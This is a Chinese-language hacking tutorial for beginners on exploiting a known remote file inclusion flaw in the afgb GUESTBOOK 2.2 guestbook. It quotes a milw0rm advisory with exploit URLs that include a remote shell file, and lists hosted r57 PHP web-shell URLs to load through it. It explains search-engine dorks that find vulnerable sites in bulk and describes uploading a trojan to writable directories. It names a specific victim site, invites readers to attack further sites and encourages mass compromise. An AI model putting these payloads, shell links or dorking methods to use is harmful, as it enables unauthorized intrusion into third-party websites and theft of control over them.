1、 怎样利用已知漏洞
2、 远程包含漏洞入侵整个过程
一、 菜鸟的感慨:
唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解!
一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机会吧,让我们尝尝坠入洞中的滋味吧”可是却只剩下那让人没有人理睬的声音在遥远的天空回荡。
说起那些做教程的高手,他们让我们我们只是看到他入侵或提权过程,却不给我们他们找漏洞的整个过程,我们看完了他的教程,却不知道何去何从。
跟着他们的步骤入侵同一个网站吧,网站不是关掉了,就是漏洞已经补上。。。。更有甚者,在网站漏洞的页面挂上木马,可耻啊!让我们沦为他们的肉鸡,让我们在担惊受怕中徘徊。做黑客,怎么可以无耻到这种地步?上天啊,求求你给我一个可以机会吧,我们用渴望的眼神望着上帝,希望他给我们提示。。。。于是。。。。《黑客手册下凡》
二 、菜鸟找漏洞
作为菜鸟的我不甘这样忍受高手的蹂躏,我要冲破束缚,翱翔在shell 的天空,这里我非常感谢我亲爱的google、百度、以及其它搜索引擎,是他们给了我们希望,给我们莫大的帮助,今天我们就让我们的 google 大和百度大叔闪亮登场,开始找洞洞的旅程吧!
首先在百度里输入“远程包含漏洞原理”这句关键字一搜,呵呵!要教程有教程,要文章有文章,我就不在多说了,2007年的第一期的《黑手》有详细的介绍,这里我简要说一下,其实远程包含漏洞就是 程序文件中的变量过滤不严可以远程包含并执行我们的php文件。
至于找程序的漏洞,对于我们菜鸟来说是比较高深的,但是,利用已经知道的漏洞也不行吗?那也太菜了,继续操作。。。。。。多搜索一些教程和文章来看看,发现一打把介绍的文章和利用的利用方法,可是都没有提示我找到漏洞站点的思路,很多都找不到利用的站点,无意中看了个教程,做的是入侵台湾留言本的步骤,从教程上得到信息有:漏洞出现的页面一个留言本的add.php 没有过滤的变量Htmls,既然漏洞出来了,我就要仔细的研究了。
在 google里输入“add.php?Htmls=”作为关键字进行搜索, 得到下图 1

图1
进入博客找到我要的信息:
AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
2006-10-13 08:19:54
大中小
# afgb GUESTBOOK V2.2 #
# Htmls Remote File Include Vulnerability #
# Turkish Hacker\'s #
# Discovered By : mdX #
# #
#------------------------------------------------------
# Cyber-Warrior TIM #
# Ay ve YIldIzlar Geceye YakISIr... #
# the moon and the stars suit the night #
########################################################
#
# Class : REmote
########################################################
# File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include \"$Htmls\";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
# _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################
download link :http://www.afgb.to/
# milw0rm.com [2006-10-12]
现在我知道了含有漏洞文件的程序名称版本号afgb GUESTBOOK V2.2,而且让我的得很有用的站点http://www.milw0rm.com/exploits里面公布很多的漏洞如图二,希望菜鸟们到里面找到有用信息通过google、百度等搜索引擎快速拿站抓鸡吧

图2
三.顺利的拿下一批webshell
通过前面得到的信息和google等搜索引擎的配合得到漏洞的站点,这次我们在google中搜索关键字“afgb GUESTBOOK V2.2”,如图3

图3
找到漏洞站点了,进去逛逛吧!来到漏洞站点http://bookgb1.xoops.twpopo.com/,如图4。

图4
至于这个程序的漏洞利用方法,这里要用到一个php木马的地址我知道的有三个:(http://www.sagi.net.cn/php.txt国内的)(http://hack-viyu.h16.ru/shell/r57shell.txt国外的r57shell)(http://pang0.by.ru/shall/pang057.zz也是r57的 ),提示注意图4和图五浏览器的区别!

图5
按照图5地址栏所示,电击浏览器的转到按钮,或直接按enter键,出现如图6 的信息

图6
这样就成功一半了,找可以写的目录上传我们的php木马
看下图7中其中r表示有读的权限,w 表示有写的权限,x 表示有执行的权限

图7
找到一个可以写的路径到我们的上传的地方上传我们的木马,上传的地方如图8:
图8

上传成功后运行我的木马,如图9。

下面的图10、图11、图12、图13是几个具有漏洞的站点,大家可以测试一下。

图10

图11

图12

图13
啊哈!找到了webshell网站,如图14、图15。

图14
![]() 图15 四、菜鸟广泛入侵 入侵本应该到此结束,可是这样不符合我做人的习惯,就象拔草,要把拔要连根拔起,呵呵,废话少说,先看了看这个留言本,并且把它下载到本地进行了分析,找特殊的页面在google 里搜索了 一下,效果并不理想 。 我把刚才得到的几个网站分析了下,共同点是,在首页的底部有版权信息为:程式设计:过往云烟 [V2.2] ,看来以这个为关键字得到一大批有漏洞的站点,接着我用 程式设计:过往云烟 [V2.1]也发现几个有漏洞的网站 有1600多项 随便试一个(截图 )图16、图17、图18、图19。 ![]() 图16 ![]() 图17 ![]() 图18 五 菜鸟总结: 这次入侵实际没有用到什么新鲜的技术,都是陈旧的,通过这篇文章我知识想告诉大家,人家发现了漏洞,我们就要通过社会工程学把战果扩大,虽然技术简单,但是思路要保持灵活嘛! |